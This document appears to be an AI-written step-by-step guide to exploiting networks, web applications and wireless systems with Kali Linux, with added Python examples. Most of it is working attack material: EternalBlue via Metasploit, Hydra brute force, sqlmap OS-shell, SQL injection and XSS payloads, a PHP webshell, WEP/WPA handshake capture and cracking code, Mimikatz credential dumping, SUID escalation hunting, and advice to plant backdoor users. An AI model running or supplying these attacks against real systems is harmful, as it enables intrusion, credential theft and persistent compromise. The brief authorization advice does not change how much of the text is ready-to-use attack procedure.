Here’s a step-by-step guide to identify and exploit vulnerabilities in networks, web applications, and wireless systems, using Kali Linux and industry-standard tools:
1. Network Vulnerability Identification & Exploitation
A. Identify Vulnerabilities
- Tools :
- Nmap : Scan for open ports and services.
```bash
nmap -sV -T4 -p- 192.168.1.100   # All 65535 TCP ports with service/version detection
```
- Nessus/OpenVAS : Identify CVE-based vulnerabilities.
```bash
sudo openvas-start   # Start OpenVAS services (newer Kali releases package it as GVM: sudo gvm-start)
```
- Nmap NSE Scripts :
```bash
nmap --script=vuln 192.168.1.100   # Run the NSE "vuln" script category against the host
```
- Common Vulnerabilities :
- Unpatched services (e.g., SMB, Apache, SSH).
- Misconfigured firewalls.
- Default credentials (e.g., admin:admin).
B. Exploit Vulnerabilities
- Metasploit Framework (run check before exploit so you only fire at a confirmed-vulnerable host):
```bash
msfconsole
search ms17_010                                  # Lists the EternalBlue module (MS17-010, CVE-2017-0144)
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
check                                            # Vulnerability check without exploiting
exploit
```
- Common Exploits :
- Unpatched SMB : EternalBlue (Windows).
- SSH with password authentication and no lockout : Brute-force with Hydra (keep the task count low so you do not trip fail2ban-style lockouts).
```bash
hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 4 192.168.1.100 ssh
```
- Weak Passwords : Use John the Ripper or Hashcat to crack hashes.
2. Web Application Vulnerability Identification & Exploitation
A. Identify Vulnerabilities
- Tools :
- OWASP ZAP : Automated web app scanning.
- sqlmap : Detect SQL injection.
```bash
sqlmap -u "http://target.com/login.php?user=admin" --dbs   # Test the user parameter and list databases
```
- DirBuster : Enumerate directories and files.
- Burp Suite : Intercept and manipulate HTTP requests.
- Common Vulnerabilities :
- SQL Injection (SQLi).
- Cross-Site Scripting (XSS) .
- Insecure File Uploads .
- Broken Authentication .
B. Exploit Vulnerabilities
- SQL Injection : escalate the finding to an OS shell (only works when the database account has the privileges sqlmap needs, e.g. file write into the web root or stacked queries):
```bash
sqlmap -u "http://target.com/login.php?user=admin" --os-shell   # Get an OS shell
```
- XSS : Inject JavaScript into a vulnerable input field and confirm it executes in the browser:
```html
<script>alert('XSS')</script>
```
- File Upload Exploits : Upload a PHP webshell (e.g., webshell.php):
```php
<?php system($_GET['cmd']); ?>
```
Access via http://target.com/upload/webshell.php?cmd=id (the upload directory must be web-reachable and allow PHP execution).
- Broken Authentication : Use Burp Suite to intercept and replay authentication tokens; session cookies that still work after logout, or that never expire, are the usual finding.
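The login-form injection that sqlmap hunts for, as an added example that is not part of the original page: a toy login check against an in-memory SQLite table (the accounts and passwords are constructed sample data), once with string-built SQL the way a vulnerable login.php does it and once with bound parameters. The three payloads show what sqlmap's bypass and --dump stages do underneath.

```python
import hashlib
import sqlite3
from typing import Optional, Tuple


def make_db() -> sqlite3.Connection:
    """Throwaway users table; the two accounts and passwords are constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT)")
    for uid, name, pw in [(1, "admin", "S3cret!Adm1n"), (2, "alice", "alice123")]:
        conn.execute("INSERT INTO users VALUES (?, ?, ?)",
                     (uid, name, hashlib.sha256(pw.encode()).hexdigest()))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple]:
    """The login.php bug sqlmap looks for: the username is pasted into the SQL text.
    Hashing the password first only closes the password field; the username field
    still controls the shape of the query."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    sql = ("SELECT id, username FROM users "
           f"WHERE username = '{username}' AND pw_hash = '{pw_hash}'")
    return conn.execute(sql).fetchone()


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple]:
    """Same check with bound parameters: the input is data and can never become SQL."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    return conn.execute("SELECT id, username FROM users WHERE username = ? AND pw_hash = ?",
                        (username, pw_hash)).fetchone()


# Payloads of the kind sqlmap sends in the "user" parameter (SQLite treats -- as a comment)
BYPASS_ADMIN = "admin'--"      # comments out the password check for one chosen account
BYPASS_ANY = "' OR 1=1--"      # WHERE clause is true for every row: the first user comes back
DUMP_HASH = "' UNION SELECT id, pw_hash FROM users WHERE username = 'admin'--"  # what --dump does


def demo() -> dict:
    """Run each payload against both implementations and return the rows that came back."""
    conn = make_db()
    return {
        "vuln_bypass_admin": login_vulnerable(conn, BYPASS_ADMIN, "wrong"),
        "vuln_bypass_any": login_vulnerable(conn, BYPASS_ANY, "wrong"),
        "vuln_dump_hash": login_vulnerable(conn, DUMP_HASH, "wrong"),
        "safe_bypass_admin": login_safe(conn, BYPASS_ADMIN, "wrong"),
        "safe_real_login": login_safe(conn, "admin", "S3cret!Adm1n"),
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(f"{name:20s} -> {row}")
```

The UNION payload is the point of the "dump the database and extract credentials" step later on: once the query shape is under attacker control, any readable column can be routed out through the login response, which is exactly what sqlmap automates.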
3. Wireless Network Vulnerability Identification & Exploitation
A. Identify Vulnerabilities
- Tools :
- Aircrack-ng suite : airodump-ng captures traffic and handshakes; aircrack-ng cracks WEP keys and WPA/WPA2 passphrases.
- Wireshark : Analyze wireless traffic.
- Common Vulnerabilities :
- Weak WPA/WPA2 passwords.
- WEP encryption (easily cracked).
- Rogue access points.
- Default SSIDs and router administration credentials.
B. Exploit Vulnerabilities
- WPA/WPA2 Cracking :
- Capture the 4-way handshake (wlan0mon is the monitor-mode interface created by airmon-ng):
```bash
airodump-ng wlan0mon -c 6 --bssid [BSSID] -w handshakes   # Lock to the AP's channel; wait for "WPA handshake:" in the header
aireplay-ng -0 1 -a [BSSID] wlan0mon                      # Optional: one deauth burst makes a connected client re-associate
```
- Crack with a wordlist:
```bash
aircrack-ng -w /usr/share/wordlists/rockyou.txt handshakes-01.cap
```
- WEP Cracking (WEP has no handshake; you collect enough encrypted packets/IVs to recover the key):
```bash
airodump-ng --bssid [BSSID] -c 6 --essid [SSID] -w wep_handshake wlan0mon
aireplay-ng -1 0 -a [BSSID] wlan0mon       # Fake authentication with the AP (-1 is fake auth, not deauth)
aireplay-ng -3 -b [BSSID] wlan0mon         # ARP request replay to generate IVs quickly
aircrack-ng -b [BSSID] wep_handshake*.cap  # Retry as the IV count grows
```
- Rogue AP Attack : Create a fake AP with hostapd and dnsmasq (an evil twin of the target SSID) to capture credentials.
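What aircrack-ng actually does with the captured handshake, as an added example that is not part of the original page: derive the PMK from each wordlist candidate, expand it to the KCK, recompute the EAPOL MIC of message 2 and compare with the captured one. Every value here (SSID, MACs, nonces, the EAPOL frame and the wordlist) is constructed inline, and the "captured" MIC is generated from a known passphrase so the block runs offline; a real run would pull those fields out of handshakes-01.cap and stream rockyou.txt into crack().

```python
import hashlib
import hmac
from typing import Iterable, Optional

# Constructed demo values. A real run takes them from the capture: SSID from the beacon,
# AP/STA MACs and ANonce from message 1, SNonce and MIC from message 2 of the handshake.
SSID = "LabNet"
AP_MAC = bytes.fromhex("00112233aabb")
STA_MAC = bytes.fromhex("66778899ccdd")
ANONCE = hashlib.sha256(b"constructed anonce").digest()
SNONCE = hashlib.sha256(b"constructed snonce").digest()


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK master key: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    This is the step that makes each wordlist candidate cost 4096 HMACs."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """First 16 bytes of the PTK (the KCK) via the 802.11i PRF:
    HMAC-SHA1(PMK, "Pairwise key expansion" || 0x00 || min/max(MACs) || min/max(nonces) || i)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return ptk[:16]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2 (CCMP) key MIC: HMAC-SHA1 over message 2 with its MIC field zeroed, cut to 16 bytes."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def build_sample_handshake(passphrase: str) -> dict:
    """Fabricate a 'captured' message 2 and its MIC from a known passphrase (demo only)."""
    # Schematic EAPOL-Key layout: header, key info/length, replay counter, SNonce, IV, RSC,
    # ID, 16 zero bytes where the MIC sits, key-data length. Not byte-exact to a real frame.
    eapol = (bytes.fromhex("0103005f02010a00") + bytes(8) + SNONCE
             + bytes(16) + bytes(8) + bytes(8) + bytes(16) + bytes(2))
    kck = ptk_kck(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return {"ssid": SSID, "ap_mac": AP_MAC, "sta_mac": STA_MAC, "anonce": ANONCE,
            "snonce": SNONCE, "eapol": eapol, "mic": eapol_mic(kck, eapol)}


def crack(handshake: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: recompute the MIC per candidate and compare with the capture."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, handshake["ssid"])
        kck = ptk_kck(pmk, handshake["ap_mac"], handshake["sta_mac"],
                      handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"]), handshake["mic"]):
            return candidate
    return None


if __name__ == "__main__":
    hs = build_sample_handshake("sunshine1")   # the weak passphrase the demo AP uses
    # Real use: crack(hs, (line.rstrip("\n") for line in open(".../rockyou.txt", errors="ignore")))
    print(crack(hs, ["password", "letmein", "sunshine1", "qwerty"]))  # sunshine1
```

Two practical consequences fall out of the code: the SSID is the PBKDF2 salt, so precomputed tables only help against default SSIDs, and nothing in the loop needs the network to be in range, which is why a passphrase that sits in rockyou.txt is gone the moment one handshake is recorded.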
4. Post-Exploitation & Privilege Escalation
A. Maintain Access
- Meterpreter :
```bash
meterpreter > sysinfo   # Get system info
meterpreter > shell     # Drop to a native shell
```
- Backdoors : Add a user or modify system files to ensure persistent access.
B. Privilege Escalation
- Linux :
- Use LinEnum / LinPEAS to find misconfigurations:
```bash
./LinEnum.sh -t   # -t: include the thorough (slower) checks
```
- Exploit SUID binaries or misconfigured services (e.g., overly permissive sudo rules).
- Windows :
- Use Mimikatz to dump credentials (needs an elevated shell: privilege::debug requests SeDebugPrivilege to read LSASS memory):
```cmd
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
```
- Exploit misconfigured services (unquoted service paths, writable service binaries) or vulnerable third-party services (e.g., Serv-U FTP).
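The SUID check that LinEnum and LinPEAS run, written out by hand as an added example (not the page's or either tool's code): walk the filesystem, keep regular files with the setuid bit, and sort them by whether the program name is one that is known to hand out a shell when setuid-root. The watchlist is a short constructed subset of GTFOBins-style entries, and make_sample_tree() builds a throwaway directory so the block runs without root.

```python
import os
import stat
import tempfile
from typing import Dict, List

# Constructed subset of program names that can be abused when SUID-root (see GTFOBins
# for the maintained catalogue); deliberately not exhaustive.
ABUSABLE_SUID = {"bash", "sh", "dash", "find", "vim", "vi", "nano", "python", "python3",
                 "perl", "cp", "mv", "env", "less", "more", "awk", "tar", "nmap"}
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}   # pseudo-filesystems: nothing useful, lots of noise


def find_suid(root: str = "/") -> List[Dict]:
    """Return regular files below root with the setuid bit set, the same set that
    find / -perm -4000 -type f 2>/dev/null reports. Unreadable directories are skipped."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)            # lstat: a symlink's own mode, never follow it
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append({"path": path, "uid": st.st_uid,
                             "root_owned": st.st_uid == 0,   # uid 0 owner -> runs as root
                             "mode": oct(stat.S_IMODE(st.st_mode))})
    return hits


def triage(hits: List[Dict]) -> Dict[str, List[str]]:
    """Split the SUID files into the ones to try first (name on the watchlist) and the
    rest, which still deserve a manual look (custom binaries are often the real finding)."""
    report: Dict[str, List[str]] = {"watchlist": [], "other": []}
    for h in hits:
        bucket = "watchlist" if os.path.basename(h["path"]) in ABUSABLE_SUID else "other"
        report[bucket].append(h["path"])
    return report


def make_sample_tree() -> Dict[str, str]:
    """Constructed sample: a temp dir holding one fake setuid 'find' and one plain file.
    Setting the setuid bit on a file you own needs no privilege; it only marks the mode."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    suid = os.path.join(root, "find")
    plain = os.path.join(root, "notes.txt")
    for path, mode in ((suid, 0o4755), (plain, 0o644)):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return {"root": root, "suid": suid, "plain": plain}


if __name__ == "__main__":
    import sys
    # Usage: python suid_triage.py /      (falls back to the constructed sample tree)
    root = sys.argv[1] if len(sys.argv) > 1 else make_sample_tree()["root"]
    found = find_suid(root)
    for h in found:
        print(f'{h["mode"]} uid={h["uid"]} {h["path"]}')
    print(triage(found))
```

Pair the watchlist hits with sudo -l output before picking a route: a SUID copy of find or vim gives a root shell in one command, whereas a custom setuid binary in "other" usually needs reversing or a PATH/relative-call check first.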
5. Quick Reference Table
| Target | Tool | Command/Usage |
|---|---|---|
| Network | Nmap | nmap -sV -T4 -p- 192.168.1.100 |
| Web | sqlmap | sqlmap -u "http://target.com/login.php?user=admin" --dbs |
| Wireless | Aircrack-ng | aircrack-ng -w wordlist.txt handshakes-01.cap |
| Exploitation | Metasploit | msfconsole; use exploit/windows/smb/ms17_010_eternalblue |
6. Best Practices
- Authorization : Always obtain written permission.
- Minimize Impact : Avoid DoS attacks or data corruption.
- Document Everything : Log commands, findings, and screenshots.
- Use VMs : Test in a controlled environment (e.g., Metasploitable VM).
- Stay Updated : Follow CVE databases (e.g., CVE Details ).
Example Workflow
- Network :
- Scan with Nmap to find an unpatched SMB service.
- Exploit with Metasploit’s EternalBlue .
- Use Meterpreter for post-exploitation (a successful EternalBlue session already runs as SYSTEM, so no further escalation is needed on that host).
- Web :
- Use sqlmap to find a SQLi vulnerability in a login form.
- Dump the database and extract credentials.
- Wireless :
- Capture a WPA handshake with Aircrack-ng .
- Crack it with a wordlist to gain network access.
Resources for Mastery
- Practice Platforms :
- Hack The Box (Real-world scenarios).
- TryHackMe (Guided labs).
- Certifications :
- OSCP (Offensive Security Certified Professional) .
- CEH (Certified Ethical Hacker) .
Final Tips
- Automate : Script repetitive tasks (e.g., Nmap scans with nmap -oX report.xml, so the results can be parsed by other tools instead of read by eye).
- Join Communities : Engage with forums like Offensive Security or Reddit’s r/penetrationtesting .
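The automation the tip above points at, and the service triage from section 1A, as one added example that is not part of the original page: parse an nmap -oX report and flag the open ports worth a closer look. The XML is a constructed sample in the layout nmap -sV -oX writes (not a real scan), and the watchlist rules are demo heuristics that decide what to inspect next, not a vulnerability database.

```python
import re
import sys
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample in the layout nmap -sV -oX writes (not output from a real scan)
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sV -T4 -p- -oX report.xml 192.168.1.100" version="7.94">
<host><status state="up" reason="echo-reply"/>
<address addr="192.168.1.100" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
<service name="ssh" product="OpenSSH" version="7.2p2 Ubuntu 4ubuntu2.8" method="probed" conf="10"/></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
<service name="http" product="Apache httpd" version="2.4.18" method="probed" conf="10"/></port>
<port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/>
<service name="microsoft-ds" product="Samba smbd" version="3.X - 4.X" method="probed" conf="10"/></port>
<port protocol="tcp" portid="8080"><state state="closed" reason="reset"/>
<service name="http-proxy" method="table" conf="3"/></port>
</ports></host>
</nmaprun>
"""

# (service name, regex over "product version", what to check next). Constructed heuristics:
# they pick what gets a closer look, they do not assert a vulnerability.
WATCHLIST = [
    ("microsoft-ds", r".*", "SMB exposed: run --script smb-vuln-ms17-010 and check whether SMBv1 is on"),
    ("netbios-ssn", r".*", "SMB/NetBIOS exposed: same checks as 445"),
    ("ftp", r".*", "FTP: try anonymous login; credentials travel in cleartext"),
    ("telnet", r".*", "Telnet: cleartext logins, try default credentials"),
    ("ssh", r"OpenSSH [1-7]\.", "OpenSSH older than 8.x: verify the distro patch level and auth methods"),
]


def parse_open_ports(xml_text: str) -> List[Dict]:
    """One record per open port: host, port, protocol, service name and the version banner."""
    rows = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue                        # closed/filtered ports carry no service to triage
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            parts = (svc.get("product"), svc.get("version")) if svc is not None else ()
            rows.append({"host": addr, "port": int(port.get("portid")),
                         "proto": port.get("protocol"), "service": name,
                         "banner": " ".join(p for p in parts if p)})
    return rows


def flag(rows: List[Dict]) -> List[Dict]:
    """Attach the first matching watchlist note to each open port; unmatched ports drop out."""
    flagged = []
    for row in rows:
        for svc, pattern, note in WATCHLIST:
            if row["service"] == svc and re.search(pattern, row["banner"]):
                flagged.append({**row, "note": note})
                break
    return flagged


if __name__ == "__main__":
    # Usage: python triage.py report.xml   (falls back to the constructed sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_NMAP_XML
    for f in flag(parse_open_ports(text)):
        print(f'{f["host"]}:{f["port"]}/{f["proto"]} {f["service"]} {f["banner"]} -> {f["note"]}')
```

Feeding the flagged rows back into targeted checks (the NSE script named in the note, or a Metasploit check) keeps the noisy "vuln" category and the exploit modules off every host, which is also what the Minimize Impact rule above asks for.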
By following these steps and using Kali Linux’s tools, you can systematically identify and exploit vulnerabilities in networks, web apps, and wireless systems while adhering to ethical standards. 🔍💻